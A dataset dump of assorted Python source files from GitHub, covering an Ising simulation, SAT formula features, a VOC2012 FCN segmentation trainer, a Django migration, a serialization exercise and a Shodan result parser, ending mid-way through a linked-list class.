seq_id
stringlengths 7
11
| text
stringlengths 156
1.7M
| repo_name
stringlengths 7
125
| sub_path
stringlengths 4
132
| file_name
stringlengths 4
77
| file_ext
stringclasses 6
values | file_size_in_byte
int64 156
1.7M
| program_lang
stringclasses 1
value | lang
stringclasses 38
values | doc_type
stringclasses 1
value | stars
int64 0
24.2k
⌀ | dataset
stringclasses 1
value | pt
stringclasses 1
value |
---|---|---|---|---|---|---|---|---|---|---|---|---|
27063319487
|
from NETWORKS import *
numAgentes = 100
interaction = 'Ising'
topologia = 'Circular'
iteracoes = numAgentes*10
gamma = np.linspace(0.0001,10,100)
valoresFinais = np.zeros((np.size(gamma),1))
for i in range(0,np.size(gamma)):
current = np.zeros((iteracoes, 1))
Grid = Network(numAgentes, interaction, topologia, iteracoes)
for j in range (0,iteracoes):
Grid.IsingInteraction(gamma[i],0,j)
current[j] = Grid.Expectative
valoresFinais[i] = np.mean(current[int(np.size(current)/2-1) :])
fig1 = plt.figure(1)
plt.plot(gamma, valoresFinais)
plt.ylabel('Magnetization')
plt.xlabel('Gamma')
plt.title('')
plt.show()
|
mconde94/Codigos-Tese
|
Behavioral Macroeconomic models/AntBasedModel.py
|
AntBasedModel.py
|
py
| 640 |
python
|
en
|
code
| 1 |
github-code
|
6
|
39824039269
|
import random
import numpy as np
from scipy.stats import entropy
class CNF:
def __init__(self, path=None, clauses=None):
if path:
with open(path, 'r') as cnf:
formula = cnf.read()
formula = formula.split('\n')
start_index = 0
while formula[start_index][0] != 'p':
start_index += 1
self.n = int(formula[start_index].split()[2])
self.variables = [i+1 for i in range(self.n)]
self.m = int(formula[start_index].split()[3])
self.clauses = [list(map(int, formula[start_index + 1 + i].split()[:-1])) for i in range(self.m)]
else:
variables = set()
for clause in clauses:
for var in clause:
variables.add(abs(var))
self.n = len(variables)
self.variables = list(variables)
self.m = len(clauses)
self.clauses = clauses
def get_size(self):
return [self.m, self.n, float(self.m) / self.n]
def get_vc(self):
nodes = {i: set() for i in self.variables}
for j in range(self.m):
for var in self.clauses[j]:
nodes[abs(var)].add(j)
nodes = [len(nodes.get(i)) for i in nodes]
nodes_np = np.array(nodes)
nodes_proba = np.unique(nodes_np, return_counts=True)[1]/float(len(nodes_np))
nodes_entropy = entropy(list(nodes_proba))
clause = []
for j in range(self.m):
cl = set()
for i in range(len(self.clauses[j])):
cl.add(abs(self.clauses[j][i]))
clause.append(len(cl))
clause_np = np.array(clause)
clause_proba = np.unique(clause_np, return_counts=True)[1]/float(len(clause_np))
clause_entropy = entropy(list(clause_proba))
return [nodes_np.mean(), nodes_np.std()/nodes_np.mean(), nodes_np.min(), nodes_np.max(), nodes_entropy,
clause_np.mean(), clause_np.std()/clause_np.mean(), clause_np.min(), clause_np.max(), clause_entropy]
def get_v(self):
variables = {i: set() for i in self.variables}
for j in range(self.m):
for var in self.clauses[j]:
for var_o in self.clauses[j]:
if abs(var_o) != abs(var):
variables[abs(var)].add(abs(var_o))
var_deg = [len(variables.get(i)) for i in variables]
var_deg_np = np.array(var_deg)
return [var_deg_np.mean(), var_deg_np.std()/var_deg_np.mean(), var_deg_np.min(), var_deg_np.max()]
def get_balance(self):
ratio_clause = []
for clause in self.clauses:
pos, neg = 0, 0
for var in clause:
if var > 0:
pos += 1
else:
neg += 1
ratio_clause.append(float(pos) / (pos + neg))
ratio_clause_np = np.array(ratio_clause)
ratio_clause_proba = np.unique(ratio_clause_np, return_counts=True)[1] / float(len(ratio_clause_np))
ratio_clause_entropy = entropy(list(ratio_clause_proba))
ration_var = {i: [0, 0] for i in self.variables}
for j in range(self.m):
for var in self.clauses[j]:
if var > 0:
ration_var.get(abs(var))[0] += 1
else:
ration_var.get(abs(var))[1] += 1
ration_var = [float(ration_var.get(i)[0]) / (ration_var.get(i)[0] + ration_var.get(i)[1]) for i in ration_var]
ration_var_np = np.array(ration_var)
ration_var_proba = np.unique(ration_var_np, return_counts=True)[1] / float(len(ration_var_np))
ration_var_entropy = entropy(list(ration_var_proba))
binary, ternary = 0, 0
for clause in self.clauses:
if len(clause) == 2:
binary += 1
elif len(clause) == 3:
ternary += 1
return [ratio_clause_np.mean(), ratio_clause_np.std()/ratio_clause_np.mean(), ratio_clause_entropy,
ration_var_np.mean(), ration_var_np.std()/ration_var_np.mean(), ration_var_np.min(),
ration_var_np.max(), ration_var_entropy, float(binary)/self.m, float(ternary)/self.m]
def get_horn(self):
num_of_horns = 0
horn_var = {i: 0 for i in self.variables}
for clause in self.clauses:
horn = True
cnt = 0
for var in clause:
if var > 0:
cnt += 1
if cnt > 1:
horn = False
break
if horn:
num_of_horns += 1
for vr in clause:
horn_var[abs(vr)] += 1
horn_var = [horn_var.get(i) for i in horn_var]
horn_var_np = np.array(horn_var)
horn_var_proba = np.unique(horn_var_np, return_counts=True)[1] / float(len(horn_var_np))
horn_var_entropy = entropy(list(horn_var_proba))
return [float(num_of_horns) / self.m, horn_var_np.mean(), horn_var_np.std()/horn_var_np.mean(),
horn_var_np.min(), horn_var_np.max(), horn_var_entropy]
def get_features(self):
size = self.get_size()
vc = self.get_vc()
v = self.get_v()
balance = self.get_balance()
horn = self.get_horn()
return size + vc + v + balance + horn
def set_var(self, var=None):
if not var:
var = random.choice(self.variables + [-i for i in self.variables])
new_clauses = [[i for i in clause if i != -var] for clause in self.clauses if var not in clause]
return CNF(clauses=new_clauses)
|
mosin26/master_thesis
|
cnf.py
|
cnf.py
|
py
| 5,685 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43079348194
|
from typing import List
class Solution:
def factorial(self, n: int) -> int:
fact = 1
for i in range(1, n+1):
fact *= i
return fact
def combination(self, n: int, r: int) -> int:
return self.factorial(n) // (self.factorial(n-r) * self.factorial(r))
def generate(self, numRows: int) -> List[List[int]]:
pascal_triangles = list()
for i in range(numRows):
inner_list = []
for j in range(i+1):
inner_list.append(self.combination(i,j))
pascal_triangles.append(inner_list)
return pascal_triangles
print(Solution().generate(5))
|
devKhush/DSALeetCodeProblems_Python
|
Pascal's Triangle/GeneratePascalTriangle.py
|
GeneratePascalTriangle.py
|
py
| 659 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6193371438
|
#! /usr/bin/env python
"""
A very simple program to print the triplet primes less than n.
Leon Hostetler, Jan. 26, 2017
USAGE: python primes_triplets.py
"""
from __future__ import division, print_function
n = 1000
# Checks to see if a number is prime
def is_prime(n):
for i in range(2, n):
if n % i == 0:
return False # Return false if divisible by any smaller number
break
return True # Return true if not divisible by any smaller number
# Print all the triplet primes less than a million
counter = 0
for i in range(2, n):
if is_prime(i) and is_prime(i+2) and is_prime(i+6):
print(i, ", ", i+2, ", ", i+6, sep="")
counter += 1
if is_prime(i) and is_prime(i+4) and is_prime(i+6):
print(i, ", ", i+4, ", ", i+6, sep="")
counter += 1
print()
print("There are ", counter, " prime triplets less than ", n, ".")
|
leonhostetler/sample-programs
|
python/prime_numbers/primes_triplets.py
|
primes_triplets.py
|
py
| 944 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37198526566
|
# _*_ coding: utf-8 _*_
# @author: anniequ
# @file: datapre.py
# @time: 2020/11/12 11:07
# @Software: PyCharm
import os
from PIL import Image
import matplotlib.pyplot as plt
import numpy as np
import torch
import torchvision.transforms as tfs
from torch.utils.data import DataLoader
from torch import nn
import torch.nn.functional as f
import torchvision
from torch.autograd import Variable
import torchvision.models as models
from datetime import datetime
voc_root = os.path.join("data", "VOC2012")
np.seterr(divide='ignore',invalid='ignore')
# 读取图片
def read_img(root=voc_root, train=True):
txt_frame = root + '/ImageSets/Segmentation/' + ('train.txt' if train else 'val.txt')
with open(txt_frame, 'r') as f:
images = f.read().split()
data = [os.path.join(root, 'JPEGImages', i + '.jpg') for i in images]
label = [os.path.join(root, 'SegmentationClass', i + '.png') for i in images]
return data, label
# 图片大小不同,同时裁剪data and label
def crop(data, label, height, width):
'data and label both are Image object'
box = (0, 0, width, height)
data = data.crop(box)
label = label.crop(box)
return data, label
# VOC数据集中对应的标签
classes = ['background', 'aeroplane', 'bicycle', 'bird', 'boat',
'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',
'dog', 'horse', 'motorbike', 'person', 'potted plant',
'sheep', 'sofa', 'train', 'tv/monitor']
# 各种标签所对应的颜色
colormap = [[0, 0, 0], [128, 0, 0], [0, 128, 0], [128, 128, 0], [0, 0, 128],
[128, 0, 128], [0, 128, 128], [128, 128, 128], [64, 0, 0], [192, 0, 0],
[64, 128, 0], [192, 128, 0], [64, 0, 128], [192, 0, 128],
[64, 128, 128], [192, 128, 128], [0, 64, 0], [128, 64, 0],
[0, 192, 0], [128, 192, 0], [0, 64, 128]]
cm2lbl = np.zeros(256 ** 3)
# 枚举的时候i是下标,cm是一个三元组,分别标记了RGB值
for i, cm in enumerate(colormap):
cm2lbl[(cm[0] * 256 + cm[1]) * 256 + cm[2]] = i
# 将标签按照RGB值填入对应类别的下标信息
def image2label(im):
data = np.array(im, dtype="int32")
idx = (data[:, :, 0] * 256 + data[:, :, 1]) * 256 + data[:, :, 2]
return np.array(cm2lbl[idx], dtype="int64")
def image_transforms(data, label, height, width):
data, label = crop(data, label, height, width)
# 将数据转换成tensor,并且做标准化处理
im_tfs = tfs.Compose([
tfs.ToTensor(),
tfs.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
data = im_tfs(data)
label = image2label(label)
label = torch.from_numpy(label)
return data, label
class VOCSegDataset(torch.utils.data.Dataset):
# 构造函数
def __init__(self, train, height, width, transforms=image_transforms):
self.height = height
self.width = width
self.fnum = 0 # 用来记录被过滤的图片数
self.transforms = transforms
data_list, label_list = read_img(train=train)
self.data_list = self._filter(data_list)
self.label_list = self._filter(label_list)
if train == True:
print("训练集:加载了 " + str(len(self.data_list)) + " 张图片和标签" + ",过滤了" + str(self.fnum) + "张图片")
else:
print("测试集:加载了 " + str(len(self.data_list)) + " 张图片和标签" + ",过滤了" + str(self.fnum) + "张图片")
# 过滤掉长小于height和宽小于width的图片
def _filter(self, images):
img = []
for im in images:
if (Image.open(im).size[1] >= self.height and
Image.open(im).size[0] >= self.width):
img.append(im)
else:
self.fnum = self.fnum + 1
return img
# 重载getitem函数,使类可以迭代
def __getitem__(self, idx):
img = self.data_list[idx]
label = self.label_list[idx]
img = Image.open(img)
label = Image.open(label).convert('RGB')
img, label = self.transforms(img, label, self.height, self.width)
return img, label
def __len__(self):
return len(self.data_list)
height = 224
width = 224
voc_train = VOCSegDataset(True, height, width)
voc_test = VOCSegDataset(False, height, width)
train_data = DataLoader(voc_train, batch_size=8, shuffle=True)
valid_data = DataLoader(voc_test, batch_size=8)
# 下面就构建一个基于resnet34的fcn网络
# 初始化转置卷积卷积核的函数
def bilinear_kernel(in_channels, out_channels, kernel_size):
factor = (kernel_size + 1) // 2
if kernel_size % 2 == 1:
center = factor - 1
else:
center = factor - 0.5
og = np.ogrid[:kernel_size, :kernel_size]
filt = (1 - abs(og[0] - center) / factor) * \
(1 - abs(og[1] - center) / factor)
weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size),
dtype='float32')
weight[range(in_channels), range(out_channels), :, :] = filt
return torch.from_numpy(np.array(weight))
# 加载预训练的resnet34网络
model_root = "./model/resnet34-333f7ec4.pth"
pretrained_net = models.resnet34(pretrained=False)
pre = torch.load(model_root)
pretrained_net.load_state_dict(pre)
# 分类的总数
num_classes = len(classes)
print(num_classes)
class fcn(nn.Module):
def __init__(self, num_classes):
super(fcn, self).__init__()
# 第一段,通道数为128,输出特征图尺寸为28*28
self.stage1 = nn.Sequential(*list(pretrained_net.children())[:-4])
# 第二段,通道数为256,输出特征图尺寸为14*14
self.stage2 = list(pretrained_net.children())[-4]
# 第三段,通道数为512,输出特征图尺寸为7*7
self.stage3 = list(pretrained_net.children())[-3]
# 三个1*1的卷积操作,各个通道信息融合
self.scores1 = nn.Conv2d(512, num_classes, 1)
self.scores2 = nn.Conv2d(256, num_classes, 1)
self.scores3 = nn.Conv2d(128, num_classes, 1)
# 将特征图尺寸放大八倍
self.upsample_8x = nn.ConvTranspose2d(num_classes, num_classes, kernel_size=16, stride=8, padding=4, bias=False)
self.upsample_8x.weight.data = bilinear_kernel(num_classes, num_classes, 16) # 使用双线性 kernel
# 这是放大了四倍,下同
self.upsample_4x = nn.ConvTranspose2d(num_classes, num_classes, kernel_size=4, stride=2, padding=1, bias=False)
self.upsample_4x.weight.data = bilinear_kernel(num_classes, num_classes, 4) # 使用双线性 kernel
self.upsample_2x = nn.ConvTranspose2d(num_classes, num_classes, kernel_size=4, stride=2, padding=1, bias=False)
self.upsample_2x.weight.data = bilinear_kernel(num_classes, num_classes, 4) # 使用双线性 kernel
def forward(self, x):
x = self.stage1(x)
s1 = x # 224/8 = 28
x = self.stage2(x)
s2 = x # 224/16 = 14
x = self.stage3(x)
s3 = x # 224/32 = 7
s3 = self.scores1(s3) # 将各通道信息融合
s3 = self.upsample_2x(s3) # 上采样
s2 = self.scores2(s2)
s2 = s2 + s3 # 14*14
s1 = self.scores3(s1)
s2 = self.upsample_4x(s2) # 上采样,变成28*28
s = s1 + s2 # 28*28
s = self.upsample_8x(s2) # 放大八倍,变成224*224
return s # 返回特征图
# 计算混淆矩阵
def _fast_hist(label_true, label_pred, n_class):
# mask在和label_true相对应的索引的位置上填入true或者false
# label_true[mask]会把mask中索引为true的元素输出
mask = (label_true >= 0) & (label_true < n_class)
# np.bincount()会给出索引对应的元素个数
"""
hist是一个混淆矩阵
hist是一个二维数组,可以写成hist[label_true][label_pred]的形式
最后得到的这个数组的意义就是行下标表示的类别预测成列下标类别的数量
比如hist[0][1]就表示类别为1的像素点被预测成类别为0的数量
对角线上就是预测正确的像素点个数
n_class * label_true[mask].astype(int) + label_pred[mask]计算得到的是二维数组元素
变成一位数组元素的时候的地址取值(每个元素大小为1),返回的是一个numpy的list,然后
np.bincount就可以计算各中取值的个数
"""
hist = np.bincount(
n_class * label_true[mask].astype(int) +
label_pred[mask], minlength=n_class ** 2).reshape(n_class, n_class)
return hist
"""
label_trues 正确的标签值
label_preds 模型输出的标签值
n_class 数据集中的分类数
"""
def label_accuracy_score(label_trues, label_preds, n_class):
"""Returns accuracy score evaluation result.
- overall accuracy
- mean accuracy
- mean IU
- fwavacc
"""
hist = np.zeros((n_class, n_class))
# 一个batch里面可能有多个数据
# 通过迭代器将一个个数据进行计算
for lt, lp in zip(label_trues, label_preds):
# numpy.ndarray.flatten将numpy对象拉成1维
hist += _fast_hist(lt.flatten(), lp.flatten(), n_class)
# np.diag(a)假如a是一个二维矩阵,那么会输出矩阵的对角线元素
# np.sum()可以计算出所有元素的和。如果axis=1,则表示按行相加
"""
acc是准确率 = 预测正确的像素点个数/总的像素点个数
acc_cls是预测的每一类别的准确率(比如第0行是预测的类别为0的准确率),然后求平均
iu是召回率Recall,公式上面给出了
mean_iu就是对iu求了一个平均
freq是每一类被预测到的频率
fwavacc是频率乘以召回率,我也不知道这个指标代表什么
"""
acc = np.diag(hist).sum() / hist.sum()
acc_cls = np.diag(hist) / hist.sum(axis=1)
# nanmean会自动忽略nan的元素求平均
acc_cls = np.nanmean(acc_cls)
iu = np.diag(hist) / (hist.sum(axis=1) + hist.sum(axis=0) - np.diag(hist))
mean_iu = np.nanmean(iu)
freq = hist.sum(axis=1) / hist.sum()
fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()
return acc, acc_cls, mean_iu, fwavacc
net = fcn(num_classes)
if torch.cuda.is_available():
net = net.cuda()
criterion = nn.NLLLoss()
basic_optim = torch.optim.SGD(net.parameters(), lr=1e-2, weight_decay=1e-4)
optimizer = basic_optim
# 训练网络
EPOCHES = 20
# 训练时的数据
train_loss = []
train_acc = []
train_acc_cls = []
train_mean_iu = []
train_fwavacc = []
# 验证时的数据
eval_loss = []
eval_acc = []
eval_acc_cls = []
eval_mean_iu = []
eval_fwavacc = []
for e in range(EPOCHES):
_train_loss = 0
_train_acc = 0
_train_acc_cls = 0
_train_mean_iu = 0
_train_fwavacc = 0
prev_time = datetime.now()
net = net.train()
for img_data, img_label in train_data:
if torch.cuda.is_available:
im = Variable(img_data).cuda()
label = Variable(img_label).cuda()
else:
im = Variable(img_data)
label = Variable(img_label)
# 前向传播
out = net(im)
out = f.log_softmax(out, dim=1)
loss = criterion(out, label)
# 反向传播
optimizer.zero_grad()
loss.backward()
optimizer.step()
_train_loss += loss.item()
# label_pred输出的是21*224*224的向量,对于每一个点都有21个分类的概率
# 我们取概率值最大的那个下标作为模型预测的标签,然后计算各种评价指标
label_pred = out.max(dim=1)[1].data.cpu().numpy()
label_true = label.data.cpu().numpy()
for lbt, lbp in zip(label_true, label_pred):
acc, acc_cls, mean_iu, fwavacc = label_accuracy_score(lbt, lbp, num_classes)
_train_acc += acc
_train_acc_cls += acc_cls
_train_mean_iu += mean_iu
_train_fwavacc += fwavacc
# 记录当前轮的数据
train_loss.append(_train_loss / len(train_data))
train_acc.append(_train_acc / len(voc_train))
train_acc_cls.append(_train_acc_cls)
train_mean_iu.append(_train_mean_iu / len(voc_train))
train_fwavacc.append(_train_fwavacc)
net = net.eval()
_eval_loss = 0
_eval_acc = 0
_eval_acc_cls = 0
_eval_mean_iu = 0
_eval_fwavacc = 0
for img_data, img_label in valid_data:
if torch.cuda.is_available():
im = Variable(img_data).cuda()
label = Variable(img_label).cuda()
else:
im = Variable(img_data)
label = Variable(img_label)
# forward
out = net(im)
out = f.log_softmax(out, dim=1)
loss = criterion(out, label)
_eval_loss += loss.item()
label_pred = out.max(dim=1)[1].data.cpu().numpy()
label_true = label.data.cpu().numpy()
for lbt, lbp in zip(label_true, label_pred):
acc, acc_cls, mean_iu, fwavacc = label_accuracy_score(lbt, lbp, num_classes)
_eval_acc += acc
_eval_acc_cls += acc_cls
_eval_mean_iu += mean_iu
_eval_fwavacc += fwavacc
# 记录当前轮的数据
eval_loss.append(_eval_loss / len(valid_data))
eval_acc.append(_eval_acc / len(voc_test))
eval_acc_cls.append(_eval_acc_cls)
eval_mean_iu.append(_eval_mean_iu / len(voc_test))
eval_fwavacc.append(_eval_fwavacc)
# 打印当前轮训练的结果
cur_time = datetime.now()
h, remainder = divmod((cur_time - prev_time).seconds, 3600)
m, s = divmod(remainder, 60)
epoch_str = ('Epoch: {}, Train Loss: {:.5f}, Train Acc: {:.5f}, Train Mean IU: {:.5f}, \
Valid Loss: {:.5f}, Valid Acc: {:.5f}, Valid Mean IU: {:.5f} '.format(
e, _train_loss / len(train_data), _train_acc / len(voc_train), _train_mean_iu / len(voc_train),
_eval_loss / len(valid_data), _eval_acc / len(voc_test), _eval_mean_iu / len(voc_test)))
time_str = 'Time: {:.0f}:{:.0f}:{:.0f}'.format(h, m, s)
print(epoch_str + time_str)
# 绘图
epoch = np.array(range(EPOCHES))
plt.plot(epoch, train_loss, label="train_loss")
plt.plot(epoch, train_loss, label="valid_loss")
plt.title("loss during training")
plt.legend()
plt.grid()
plt.show()
plt.plot(epoch, train_acc, label="train_acc")
plt.plot(epoch, eval_acc, label="valid_acc")
plt.title("accuracy during training")
plt.legend()
plt.grid()
plt.show()
plt.plot(epoch, train_mean_iu, label="train_mean_iu")
plt.plot(epoch, eval_mean_iu, label="valid_mean_iu")
plt.title("mean iu during training")
plt.legend()
plt.grid()
plt.show()
# 测试模型性能
# 保存模型
PATH = "./model/fcn-resnet34.pth"
torch.save(net.state_dict(), PATH)
# 加载模型
# model.load_state_dict(torch.load(PATH))
cm = np.array(colormap).astype('uint8')
def predict(img, label): # 预测结果
img = Variable(img.unsqueeze(0)).cuda()
out = net(img)
pred = out.max(1)[1].squeeze().cpu().data.numpy()
# 将pred的分类值,转换成各个分类对应的RGB值
pred = cm[pred]
# 将numpy转换成PIL对象
pred = Image.fromarray(pred)
label = cm[label.numpy()]
return pred, label
size = 224
num_image = 10
_, figs = plt.subplots(num_image, 3, figsize=(12, 22))
for i in range(num_image):
img_data, img_label = voc_test[i]
pred, label = predict(img_data, img_label)
img_data = Image.open(voc_test.data_list[i])
img_label = Image.open(voc_test.label_list[i]).convert("RGB")
img_data, img_label = crop(img_data, img_label, size, size)
figs[i, 0].imshow(img_data) # 原始图片
figs[i, 0].axes.get_xaxis().set_visible(False) # 去掉x轴
figs[i, 0].axes.get_yaxis().set_visible(False) # 去掉y轴
figs[i, 1].imshow(img_label) # 标签
figs[i, 1].axes.get_xaxis().set_visible(False) # 去掉x轴
figs[i, 1].axes.get_yaxis().set_visible(False) # 去掉y轴
figs[i, 2].imshow(pred) # 模型输出结果
figs[i, 2].axes.get_xaxis().set_visible(False) # 去掉x轴
figs[i, 2].axes.get_yaxis().set_visible(False) # 去掉y轴
# 在最后一行图片下面添加标题
figs[num_image - 1, 0].set_title("Image", y=-0.2)
figs[num_image - 1, 1].set_title("Label", y=-0.2)
figs[num_image - 1, 2].set_title("fcns", y=-0.2)
|
Anniequ/FCNcopy
|
all.py
|
all.py
|
py
| 16,271 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32108115946
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("orgs", "0014_auto_20150722_1419")]
operations = [
migrations.CreateModel(
name="ContactField",
fields=[
("id", models.AutoField(verbose_name="ID", serialize=False, auto_created=True, primary_key=True)),
("label", models.CharField(max_length=36, verbose_name="Label")),
("key", models.CharField(max_length=36, verbose_name="Key")),
("value_type", models.CharField(max_length=1, verbose_name="Field Type")),
(
"org",
models.ForeignKey(
related_name="contactfields", on_delete=models.PROTECT, verbose_name="Org", to="orgs.Org"
),
),
],
)
]
|
rapidpro/ureport
|
ureport/contacts/migrations/0001_initial.py
|
0001_initial.py
|
py
| 990 |
python
|
en
|
code
| 23 |
github-code
|
6
|
29057620857
|
#!/usr/bin/python3
"""
base module contains the Base class
"""
import json
class Base:
"""
Base class: manage id attribute in all the subclass
Attributes:
__nb_objects - class attribute initialized with 0
__init__ - class constructor
"""
__nb_objects = 0
def __init__(self, id=None):
"""assign the public instance attribute id"""
if id:
self.id = id
else:
type(self).__nb_objects += 1
self.id = type(self).__nb_objects
@staticmethod
def to_json_string(list_dictionaries):
"""returns the JSON string repr"""
if list_dictionaries:
return json.dumps(list_dictionaries)
return "[]"
@classmethod
def save_to_file(cls, list_objs):
"""writes the JSON string repr of list_objs to a file"""
list_dict = []
if list_objs:
for i in list_objs:
list_dict.append(i.to_dictionary())
objs_json = cls.to_json_string(list_dict)
filename = cls.__name__ + ".json"
with open(filename, 'w', encoding="utf-8") as f:
f.write(objs_json)
@staticmethod
def from_json_string(json_string):
"""deserialises the json obj and returns the python object"""
import json
if not json_string:
return []
return json.loads(json_string)
@classmethod
def create(cls, **dictionary):
"""returns an instance with all attr already set"""
if not dictionary:
return cls
if cls.__name__ == "Rectangle":
rectangle = cls(1, 1)
rectangle.update(**dictionary)
return rectangle
square = cls(1)
square.update(**dictionary)
return square
@classmethod
def load_from_file(cls):
"""returns a list of instances"""
import os
filename = cls.__name__ + ".json"
if not os.path.exists(filename):
return []
with open(filename, "r", encoding='utf-8') as f:
json_str = f.read()
list_dict = cls.from_json_string(json_str)
list_obj = []
for item in list_dict:
instance = cls.create(**item)
list_obj.append(instance)
return list_obj
@classmethod
def save_to_file_csv(cls, list_objs):
"""parse list_objs to csv"""
import csv
"""if not list_objs:
return None"""
if cls.__name__ == "Rectangle":
fields = ["id", "width", "height", "x", "y"]
elif cls.__name__ == "Square":
fields = ["id", "size", "x", "y"]
filename = cls.__name__ + ".csv"
with open(filename, 'w', newline='', encoding='utf-8') as f:
csvwriter = csv.writer(f)
csvwriter.writerow(fields)
list_dict = []
for item in list_objs:
cls_dict = item.to_dictionary()
instance_value = []
for key in fields:
instance_value.append(cls_dict[key])
list_dict.append(instance_value)
csvwriter.writerows(list_dict)
@classmethod
def load_from_file_csv(cls):
"""load a csv to list_obj"""
import csv
filename = cls.__name__ + ".csv"
list_objs = []
with open(filename, 'r', newline='', encoding='utf-8') as f:
csvreader = csv.reader(f)
fields = next(csvreader)
key_value = {}
for row in csvreader:
i = 0
for attr in fields:
key_value[attr] = int(row[i])
i += 1
python_obj = cls.create(**key_value)
list_objs.append(python_obj)
return list_objs
|
ZIHCO/alx-higher_level_programming
|
0x0C-python-almost_a_circle/models/base.py
|
base.py
|
py
| 3,809 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43332148964
|
import logging
import json
import gzip
import ipaddress
import datetime
from c99api import EndpointClient
from typing import List, Dict, Optional
from os.path import exists
from pydantic import BaseModel
logger = logging.getLogger()
def enrich_object_c99(object, c99_key:str=""):
c99 = EndpointClient
c99.key = c99_key
ip = object["IPAddress"]
resp = c99.gethostname(ip)
if resp["success"] and ip != resp["hostname"] and resp["hostname"] not in object["hostname_list"]:
logging.info(f"gethostname: {resp['hostname']}")
object["hostname_list"].append(resp["hostname"])
resp = c99.ip2domains(ip)
if resp["success"] and resp["count"] >= 1:
logging.info(f"ip2domains: {resp['data']}")
object["domain_list"].extend([hname for hname in resp["data"] if hname not in object["domain_list"]])
def merge_config(current_config: Dict[int, str] = {}, custom_config: Dict[int, str] = {}):
for key, value in custom_config.items():
if key in current_config.keys():
if isinstance(value, (list,)):
current_config[key] = list(set(current_config[key].extend(current_config[key])))
elif isinstance(value, (dict,)):
current_config[key] = merge_config(current_config[key], custom_config[key])
else:
current_config[key] = value
else:
current_config.update({key: value})
return current_config
def load_config(default_config: str = "config.default.json", override_config: str = ""):
config_builder = {}
if exists(default_config):
with open(default_config, "r", encoding="utf-8") as config_file:
config_builder = json.load(config_file)
else:
raise ValueError("config file not found")
if exists(override_config):
with open(override_config, "r", encoding="utf-8") as config_file:
try:
configData = json.load(config_file)
config_builder = merge_config(current_config=config_builder, custom_config=configData)
except Exception as e:
logger.error(f"Error adding override config\n{e}")
return config_builder
def decode_shodan(obj:dict={}):
try:
parsed_object = {
"domain_list": obj["domains"] if "domains" in obj else [],
"hostname_list": [obj["_shodan"]["options"]["hostname"]] if "hostname" in obj["_shodan"]["options"] else [],
"cloud_provider": None,
"operating_system": obj["os"],
"product": obj["product"] if "product" in obj else "",
"IPAddress": ipaddress.ip_address(obj["ip_str"]),
"timestamp": datetime.datetime.fromisoformat(obj["timestamp"]),
"protocol": obj["transport"] if "transport" in obj else "",
"internet_service_provider": obj["isp"],
"version": obj["version"] if "version" in obj else "",
"organisation": obj["org"],
"country": obj["location"]["country_name"] if "country_name" in obj["location"] else "",
"city": obj["location"]["city"] if "city" in obj["location"] else "",
"port": obj["port"]
}
parsed_object["hostname_list"].extend([hname.strip() for hname in obj["hostnames"]])
except Exception as e:
logging.error(e)
return {}
try:
if "ssl" in obj and "cert" in obj["ssl"]:
cert = obj["ssl"]
#parsed_object["ssl_fingerprint"] = cert["cert"]["fingerprint"]["sha256"]
#parsed_object["ssl_serial"] = cert["cert"]["serial"]
parsed_object["ssl_SAN"] = [cert["cert"]["subject"]["CN"]] if "CN" in cert["cert"]["subject"]["CN"] else []
for alt in cert["cert"]["extensions"]:
if alt["name"]=="subjectAltName" and alt["data"]:
i = 0
while i < len(alt["data"]):
if alt["data"][i] == "\\":
i += 4
continue
next_slash = alt["data"][i:].find("\\")
if next_slash >= 0:
parsed_object["ssl_SAN"].append(alt["data"][i:i+next_slash])
i += next_slash
else:
parsed_object["ssl_SAN"].append(alt["data"][i:])
i = len(alt["data"])
if parsed_object["ssl_SAN"][-1] == "0.":
parsed_object["ssl_SAN"].pop()
parsed_object["ssl_SAN"] = list(set(parsed_object["ssl_SAN"]))
parsed_object["ssl_issuer"] = cert["cert"]["issuer"]["O"] if "O" in cert["cert"]["issuer"] else cert["cert"]["issuer"]["CN"]
#parsed_object["ssl_ja3"] = cert["ja3s"]
#parsed_object["ssl_jarm"] = cert["jarm"]
parsed_object["ssl_expiration"] = datetime.datetime.strptime(cert["cert"]["expires"], "%Y%m%d%H%M%SZ")
else:
#parsed_object["ssl_fingerprint"] = ""
#parsed_object["ssl_serial"] = -1
parsed_object["ssl_SAN"] = []
parsed_object["ssl_issuer"] = ""
#parsed_object["ssl_ja3"] = ""
#parsed_object["ssl_jarm"] = ""
parsed_object["ssl_expiration"] = datetime.datetime.fromordinal(1)
except Exception as e:
#parsed_object["ssl_fingerprint"] = ""
#parsed_object["ssl_serial"] = -1
parsed_object["ssl_SAN"] = []
parsed_object["ssl_issuer"] = ""
#parsed_object["ssl_ja3"] = ""
#parsed_object["ssl_jarm"] = ""
parsed_object["ssl_expiration"] = datetime.datetime.fromordinal(1)
logging.error(e)
return parsed_object
def load_shodan_files(filename:str="", config:Dict={}):
if not exists(filename):
logging.error(f"File not found: {filename}")
raise FileNotFoundError
logging.info(f"Loading file: {filename}")
if filename.endswith(".json.gz"):
with gzip.open(filename, "rb") as archive:
lines = archive.readlines()
else:
with open(filename, "rb") as raw_file:
lines = raw_file.readlines()
data = []
error_count = 0
for line in lines:
try:
json_obj = json.loads(line)
try:
obj = decode_shodan(obj=json_obj)
data.append(obj)
except Exception as e:
logger.warning(f"JSON data could not be parsed")
logger.warning(e)
except:
error_count += 1
continue
if error_count > 0:
logging.error(f"{filename} - Errors occurred during loading of data: {error_count}")
return data
if __name__ == "__main__":
configFileName = "../../config/config.default.json"
loaded_config = load_config(default_config=configFileName)
logConfig = loaded_config["logging"]
logging.basicConfig(
level=logConfig["log_level"],
format=logConfig["log_fstr_std"],
datefmt=logConfig["log_date_formt"]
)
pass
|
Magnus1990P/shodan_extractor
|
src/ShodanExtractor/common.py
|
common.py
|
py
| 7,089 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22957669261
|
class Node:
def __init__(self, value):
self.value = value
self.next = None
def __str__(self):
return str(self.value)
class LinkedList:
def __init__(self):
self.First = None
self.Size = 0
def append(self, value):
